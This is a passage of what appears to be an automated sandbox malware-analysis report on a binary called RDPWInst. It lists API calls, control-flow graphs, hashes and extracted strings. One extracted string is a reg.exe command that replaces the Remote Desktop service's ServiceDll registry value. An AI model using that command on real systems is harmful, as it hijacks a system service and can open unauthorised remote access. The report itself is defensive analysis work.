                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                                                                                                                        • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                                                                                                                        • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                                                                                                                        • String ID: en-GB,en,en-US,
                                                                                                                                                        • API String ID: 1058953229-3021119265
                                                                                                                                                        • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                                                                        • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                                                                                                                        • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                                                                        • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                                                                        • GetLastError.KERNEL32(00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                                                                                                                        • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                                                                                                                        • API String ID: 1809907545-775158141
                                                                                                                                                        • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                                                                        • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                                                                                                                        • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                                                                        • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1469 40472c-404740 1470 404742-404743 1469->1470 1471 40474d-404763 1469->1471 1473 404765-404774 1470->1473 1474 404745-404746 1470->1474 1472 40478c-40479f 1471->1472 1478 4047a5-4047bd CreateFileW 1472->1478 1479 404857-404874 1472->1479 1477 404785 1473->1477 1475 404776-404780 1474->1475 1476 404748 1474->1476 1475->1477 1480 4048b5-4048b6 1476->1480 1477->1472 1483 4047c3-4047cb 1478->1483 1484 4048cb-4048d6 GetLastError 1478->1484 1481 404876-404878 1479->1481 1482 40487a-404880 1479->1482 1485 404888-404890 GetStdHandle 1481->1485 1486 404882-404884 1482->1486 1487 404886 1482->1487 1488 4047d1-4047df GetFileSize 1483->1488 1489 404894-40489a 1483->1489 1484->1480 1485->1484 1491 404892 1485->1491 1486->1485 1487->1485 1488->1484 1490 4047e5-4047ea 1488->1490 1492 4048b3 1489->1492 1493 40489c-4048a5 GetFileType 1489->1493 1494 4047ec 1490->1494 1495 4047ee-4047fb SetFilePointer 1490->1495 1491->1489 1492->1480 1496 4048b7-4048c9 CloseHandle 1493->1496 1497 4048a7-4048aa 1493->1497 1494->1495 1495->1484 1498 404801-40481d ReadFile 1495->1498 1496->1480 1497->1492 1499 4048ac 1497->1499 1498->1484 1500 404823 1498->1500 1499->1492 1501 404825-404827 1500->1501 1501->1489 1502 404829-404831 1501->1502 1503 404833-404834 1502->1503 1504 404836-404845 SetFilePointer 1502->1504 1503->1501 1504->1484 1505 40484b-404853 SetEndOfFile 1504->1505 1505->1484 1506 404855 1505->1506 1506->1489
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                                                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                                                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                                                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                                                                                                                        • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1694776339-0
                                                                                                                                                        • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                                                                        • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                                                                                                                        • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                                                                        • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                                                                                                                        • String ID: $sD$D$[-] CreateProcess error (code:
                                                                                                                                                        • API String ID: 1377960556-1026335874
                                                                                                                                                        • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                                                                                        • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                                                                                                                        • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                                                                                        • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1531 403028-403037 1532 403120-403123 1531->1532 1533 40303d-403041 1531->1533 1536 403210-403214 1532->1536 1537 403129-403133 1532->1537 1534 403043-40304a 1533->1534 1535 4030a4-4030ad 1533->1535 1543 403078-40307a 1534->1543 1544 40304c-403057 1534->1544 1535->1534 1542 4030af-4030b8 1535->1542 1540 402ab4-402ad9 call 402a08 1536->1540 1541 40321a-40321f 1536->1541 1538 4030e4-4030f1 1537->1538 1539 403135-403141 1537->1539 1538->1539 1552 4030f3-4030fc 1538->1552 1547 403143-403146 1539->1547 1548 403178-403186 1539->1548 1560 402af5-402afc 1540->1560 1561 402adb-402aea VirtualFree 1540->1561 1542->1535 1551 4030ba-4030ce Sleep 1542->1551 1549 40307c-40308d 1543->1549 1550 40308f 1543->1550 1545 403060-403075 1544->1545 1546 403059-40305e 1544->1546 1555 40314a-40314e 1547->1555 1548->1555 1557 403188-40318d call 402884 1548->1557 1549->1550 1556 403092-40309f 1549->1556 1550->1556 1551->1534 1558 4030d4-4030df Sleep 1551->1558 1552->1538 1559 4030fe-403112 Sleep 1552->1559 1562 403190-40319d 1555->1562 1563 403150-403156 1555->1563 1556->1537 1557->1555 1558->1535 1559->1539 1565 403114-40311b Sleep 1559->1565 1570 402afe-402b1a VirtualQuery VirtualFree 1560->1570 1566 402af0-402af3 1561->1566 1567 402aec-402aee 1561->1567 1562->1563 1572 40319f-4031a6 call 402884 1562->1572 1568 4031a8-4031b2 1563->1568 1569 403158-403176 call 4028c4 1563->1569 1565->1538 1575 402b2f-402b31 1566->1575 1567->1575 1573 4031e0-40320d call 402924 1568->1573 1574 4031b4-4031dc VirtualFree 1568->1574 1577 402b21-402b27 1570->1577 1578 402b1c-402b1f 1570->1578 1572->1563 1583 402b33-402b43 1575->1583 1584 402b46-402b56 1575->1584 1577->1575 1582 402b29-402b2d 1577->1582 1578->1575 1582->1570 1583->1584
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                                                                                        • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                                                                                                                        • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                                                                                        • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                                                                                                                        Strings
                                                                                                                                                        • $sD, xrefs: 0043C60D
                                                                                                                                                        • " /f, xrefs: 0043C69A
                                                                                                                                                        • ServiceDll, xrefs: 0043C650
                                                                                                                                                        • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                                                                                                                        • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                                                                                                                        • %SystemRoot%, xrefs: 0043C682
                                                                                                                                                        • [-] OpenKey error (code , xrefs: 0043C612
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                        • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                                                                                                                        • API String ID: 1452528299-2956723230
                                                                                                                                                        • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                                                                                        • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
                                                                                                                                                        • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                                                                                        • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                                                                                        • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                                                                                                                        • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                                                                                        • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                                                                        • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3749826553-0
                                                                                                                                                        • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                                                                                        • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                                                                                                                        • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                                                                                        • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                                                                                                                        • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                        • String ID: $zD$xPD
                                                                                                                                                        • API String ID: 1263568516-535612291
                                                                                                                                                        • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                                                                                        • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                                                                                                                        • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                                                                                        • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
